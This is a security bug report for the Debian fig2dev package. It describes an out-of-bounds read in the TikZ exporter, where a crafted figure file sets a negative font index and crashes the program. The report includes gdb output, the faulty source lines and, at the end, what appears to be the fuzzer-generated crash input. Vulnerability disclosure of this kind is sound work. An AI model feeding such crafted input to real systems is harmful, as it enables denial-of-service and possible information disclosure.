Package: fig2dev
Version: 1:3.2.6a-4
Severity: important
Tags: security
out of bound read while running fig2dev with -L tikz option
Running 'fig2dev -L tikz poc' with the attached file raises out of bound read
bug
which may allow a remote attack to cause a denial-of-service attack or
information
disclosure with a crafted file.
I expected the program to terminate without segfault, but the program crashes
as follow
I sent this to debian security team before, but I didn't get any response.
So I send this to public.
=======================================================
june@june:~/project/analyze/poc/fig2dev/crash1$ fig2dev -L tikz poc
\ifx\XFigwidth\undefined\dimen1=0pt\else\dimen1\XFigwidth\fi
\divide\dimen1 by 1
\ifx\XFigheight\undefined\dimen3=0pt\else\dimen3\XFigheight\fi
\divide\dimen3 by 5
\ifdim\dimen1=0pt\ifdim\dimen3=0pt\dimen1=-9223372036854775808sp\dimen3\dimen1
\else\dimen1\dimen3\fi\else\ifdim\dimen3=0pt\dimen3\dimen1\fi\fi
\tikzpicture[x=+\dimen1, y=+\dimen3]
{\ifx\XFigu\undefined\catcode`\@11
\def\temp{\alloc@1\dimen\dimendef\insc@unt}\temp\XFigu\catcode`\@12\fi}
\XFigu-9223372036854775808sp
% Uncomment to scale line thicknesses with the same
% factor as width of the drawing.
%\pgfextractx\XFigu{\pgfqpointxy{1}{1}}
\ifdim\XFigu<0pt\XFigu-\XFigu\fi
\clip(91,-1) rectangle (92,4);
\tikzset{inner sep=+0pt, outer sep=+0pt}
Segmentation fault
[debugging]
Program received signal SIGSEGV, Segmentation fault.
strlen () at ../sysdeps/x86_64/strlen.S:106
106 ../sysdeps/x86_64/strlen.S: No such file or directory.
(gdb) bt
#0 strlen () at ../sysdeps/x86_64/strlen.S:106
#1 0x00007ffff7339d78 in _IO_vfprintf_internal (s=0x7ffff768b600
<_IO_2_1_stdout_>,
format=<optimized out>, ap=ap@entry=0x7fffffffde88) at vfprintf.c:1637
#2 0x00007ffff7340157 in __fprintf (stream=<optimized out>,
format=format@entry=0x5555555cc7e5 "\\normalfont%s ") at fprintf.c:32
#3 0x00005555555b4615 in put_font (t=0x555555810160) at gentikz.c:1725
#4 gentikz_text (t=0x555555810160) at gentikz.c:1769
#5 0x00005555555618cd in gendev_objects (dev=0x5555557f8ec0 <dev_tikz>,
objects=0x7fffffffdfa0)
at fig2dev.c:833
#6 main (argc=<optimized out>, argv=<optimized out>) at fig2dev.c:467
(gdb) x/i $rip
=> 0x7ffff7371646 <strlen+38>: movdqu (%rax),%xmm4
(gdb) i r rax
rax 0x29292922 690563362
(gdb) f 3
#3 0x00005555555b4615 in put_font (t=0x555555810160) at gentikz.c:1725
1725 fprintf(tfp, "\\normalfont%s ",
(gdb) p t->font
$1 = -51
(gdb) p texfonts[-51]
$3 = 0x29292922 <error: Cannot access memory at address 0x29292922>
with attached file, t->font can be set to negative value which causes this bug
[fig2dev/dev/gentikz.c]
1724 else
1725 fprintf(tfp, "\\normalfont%s ",
1726 texfonts[t->font <= MAX_FONT ? t->font : MAX_FONT - 1]);
=======================================================
This bug was found with a fuzzer developed by 'SoftSec' group at KAIST.
-- System Information:
Debian Release: buster/sid
APT prefers unstable-debug
APT policy: (500, 'unstable-debug'), (500, 'testing-debug'), (500,
'stable-updates'), (500, 'testing'), (500, 'stable'), (1, 'experimental-debug')
Architecture: amd64 (x86_64)
Kernel: Linux 4.9.0-3-amd64 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8),
LANGUAGE=en_US:en (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
Versions of packages fig2dev depends on:
ii gawk 1:4.1.4+dfsg-1
ii libc6 2.24-17
ii libpng16-16 1.6.34-1
ii libxpm4 1:3.5.12-1
ii x11-common 1:7.7+19
Versions of packages fig2dev recommends:
ii ghostscript 9.22~dfsg-1
ii netpbm 2:10.0-15.3+b2
Versions of packages fig2dev suggests:
pn xfig <none>
-- no debconf information
1 1
1
11 4-51
11 0 5�
1
91
1
c!!!!
